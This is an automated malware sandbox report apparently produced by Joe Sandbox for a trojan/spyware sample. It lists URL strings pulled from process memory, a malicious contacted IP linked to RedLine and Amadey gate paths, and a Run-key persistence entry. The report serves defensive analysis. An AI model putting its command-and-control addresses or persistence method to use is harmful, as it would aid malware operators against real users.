                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://tempuri.org/Entity/Id13ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/faultF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsatF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id15ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://android.notify.windows.com/iOSdexplorer.exe, 00000005.00000000.1434367193.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000002.2677506416.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.ip.sb/ipexplorer.exe, 00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id1ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader21AB.tmp.zx.exe, 0000000D.00000002.1630578808.0000021343B4B000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1630516326.0000021343AD2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1629829675.0000021343ACF000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1628971577.0000021343AB8000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1620506769.0000021343AD8000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1628911225.0000021343B48000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1626054210.0000021343AB1000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1629978239.0000021343AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.datacontract.org/2004/07/System.ServiceModelF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id24ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id21ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://crl.mic421AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000000.1434367193.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2687597599.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://tempuri.org/Entity/Id5ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id15ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/Entity/Id10ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RenewF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Entity/Id8ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002996000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.microexplorer.exe, 00000005.00000000.1419270768.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2679420164.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2674228477.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/:hardwares.F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002996000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tempuri.org/DF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingexF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://crl.thawte.com/ThawteTimestampingCA.crl021AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://tempuri.org/Entity/Id13ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://tempuri.org/Entity/Id12ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://tempuri.org/Entity/Id7ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://tempuri.org/Entity/Id4ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policyF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://tempuri.org/Entity/Id22ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://tempuri.org/Entity/Id22ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id16ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://ns.adobeSexplorer.exe, 00000005.00000000.1416361208.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2675911061.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/IssueF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          185.81.68.147
                                                                                                                                                                                                          		unknownFinland
                                                                                                                                                                                                          		50108KLNOPT-ASFItrue

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                          Analysis ID:1576604
                                                                                                                                                                                                          Start date and time:2024-12-17 10:13:59 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 10m 16s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:20
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:uFVgJVXaEU.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:bfae2c479a12cbc660e580a84d3e3ce0.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@29/57@0/1
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 64%
                                                                                                                                                                                                          • Number of executed functions: 166
                                                                                                                                                                                                          • Number of non-executed functions: 304
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: uFVgJVXaEU.exe

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          04:14:54API Interceptor8337x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                          04:14:54API Interceptor8245x Sleep call for process: audiodg.exe modified
                                                                                                                                                                                                          04:14:54API Interceptor337798x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                          04:14:57API Interceptor6581x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                          04:15:20API Interceptor17x Sleep call for process: F72F.tmp.ssg.exe modified
                                                                                                                                                                                                          10:14:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe
                                                                                                                                                                                                          10:15:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          185.81.68.147m5804Te9Uw.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                          • 185.81.68.147/VzCAHn.php?443320E440F81953448019
                                                                                                                                                                                                          3Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                          • 185.81.68.147/VzCAHn.php?65D35BAB97073674480464
                                                                                                                                                                                                          K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                                          • 185.81.68.147/VzCAHn.php?616766F8886C145454191
                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                          • 185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
                                                                                                                                                                                                          mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                          • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                          D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                          • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                          D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                          • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                          hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                          • 185.81.68.147/7vhfjke3/index.php?wal=1
                                                                                                                                                                                                          tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                          • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                          yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                          • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          KLNOPT-ASFIm5804Te9Uw.exeGet hashmaliciousRedLineBrowse
